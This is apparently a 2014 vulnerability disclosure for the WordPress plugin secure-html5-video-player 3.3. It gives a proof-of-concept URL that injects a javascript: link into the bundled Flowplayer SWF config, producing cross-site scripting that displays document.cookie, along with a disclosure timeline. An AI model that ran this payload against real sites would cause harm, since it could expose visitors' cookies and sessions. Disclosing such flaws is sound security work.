wp-plugin : secure-html5-video-player

Plugin Details
Plugin Name: wp-plugin : secure-html5-video-player
Effected Version : 3.3 (and most probably lower version's if any)
Vulnerability : Components with Known Vulnerabilities
Identified by : prajalkulkarni
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

http://127.0.0.1/wordpress/wp-content/securehtml5videoplayer/flowplayer/flowplayer-3.2.7.swf?config={%22clip%22:{%22url%22:%22http://pseudo01.hddn.com/vod/demo.flowplayervod/flowplayer-700.flv%22,%20%22linkUrl%22:%22javascript:alert%28String.fromCharCode%2888,83,83%29%29;alert%28document.cookie%29%22},%22screen%22:{%22height%22:%22100pct%22,%22top%22:0},%22plugins%22:{%22controls%22:{%22timeColor%22:%22#ffffff%22,%22borderRadius%22:%220px%22,%22buttonOffColor%22:%22rgba%28130,130,130,1%29%22,%22bufferGradient%22:%22none%22,%22sliderColor%22:%22#000000%22,%22zIndex%22:1,%22backgroundColor%22:%22rgba%280,%200,%200,%200%29%22,%22scrubberHeightRatio%22:0.6,%22tooltipTextColor%22:%22#ffffff%22,%22volumeSliderGradient%22:%22none%22,%22spacing%22:{%22time%22:6,%22volume%22:8,%22all%22:2},%22sliderGradient%22:%22none%22,%22timeBorderRadius%22:20,%22timeBgHeightRatio%22:0.8,%22volumeSliderHeightRatio%22:0.6,%22progressGradient%22:%22none%22,%22height%22:26,%22volumeColor%22:%22#4599ff%22,%22tooltips%22:{%22marginBottom%22:5,%22buttons%22:false},%22timeSeparator%22:%22%20%22,%22name%22:%22controls%22,%22volumeBarHeightRatio%22:0.2,%22opacity%22:1,%22timeFontSize%22:12,%22left%22:%2250pct%22,%22tooltipColor%22:%22rgba%280,%200,%200,%200%29%22,%22bufferColor%22:%22#a3a3a3%22,%22volumeSliderColor%22:%22#ffffff%22,%22border%22:%220px%22,%22buttonColor%22:%22#ffffff%22,%22durationColor%22:%22#b8d9ff%22,%22autoHide%22:{%22enabled%22:true,%22hideDelay%22:500,%22hideStyle%22:%22fade%22,%22mouseOutDelay%22:500,%22hideDuration%22:400,%22fullscreenOnly%22:true},%22backgroundGradient%22:%22none%22,%22width%22:%22100pct%22,%22sliderBorder%22:%221px%20solid%20rgba%28128,%20128,%20128,%200.7%29%22,%22display%22:%22block%22,%22buttonOverColor%22:%22#ffffff%22,%22url%22:%22flowplayer.controls-3.2.5.swf%22,%22timeBorder%22:%220px%20solid%20rgba%280,%200,%200,%200.3%29%22,%22progressColor%22:%22#4599ff%22,%22timeBgColor%22:%22rgb%280,%200,%200,%200%29%22,%22scrubberBarHeightRatio%22:0.2,%22bottom%22:0,%22builtIn%22:false,%22volumeBorder%22:%221px%20solid%20rgba%28128,%20128,%20128,%200.7%29%22,%22margins%22:[2,12,2,12]}}}


Disclosure Timeline
Vendor Contacted : 2014-01-05
Plugin Status : Updated on 2014-01-11
Public Disclosure : May 25, 2014
CVE Number :
Plugin Description :
[| A video plugin for WordPress built on the VideoJS HTML5 video player library. Allows you to embed video in your post or page using HTML5 with Flash fallback support for non-HTML5 browsers. Settings can be easily configured with a control panel and simplified short codes. Video files can be served from a secured private directory or from an Amazon S3 compatible file storage service. Youtube or Vimeo video may be used as a fallback mechanism, or as primary videos, with HTML5 videos acting as fallbacks should the posted videos go away. See <a href="http://www.trillamar.com/webcraft/secure-html5-video-player/">www.trillamar.com/secure-html5-video-player/</a> for additional information about Secure HTML5 Video Player. See <a href="http://videojs.com/">VideoJS.com</a> for additional information about VideoJS. ]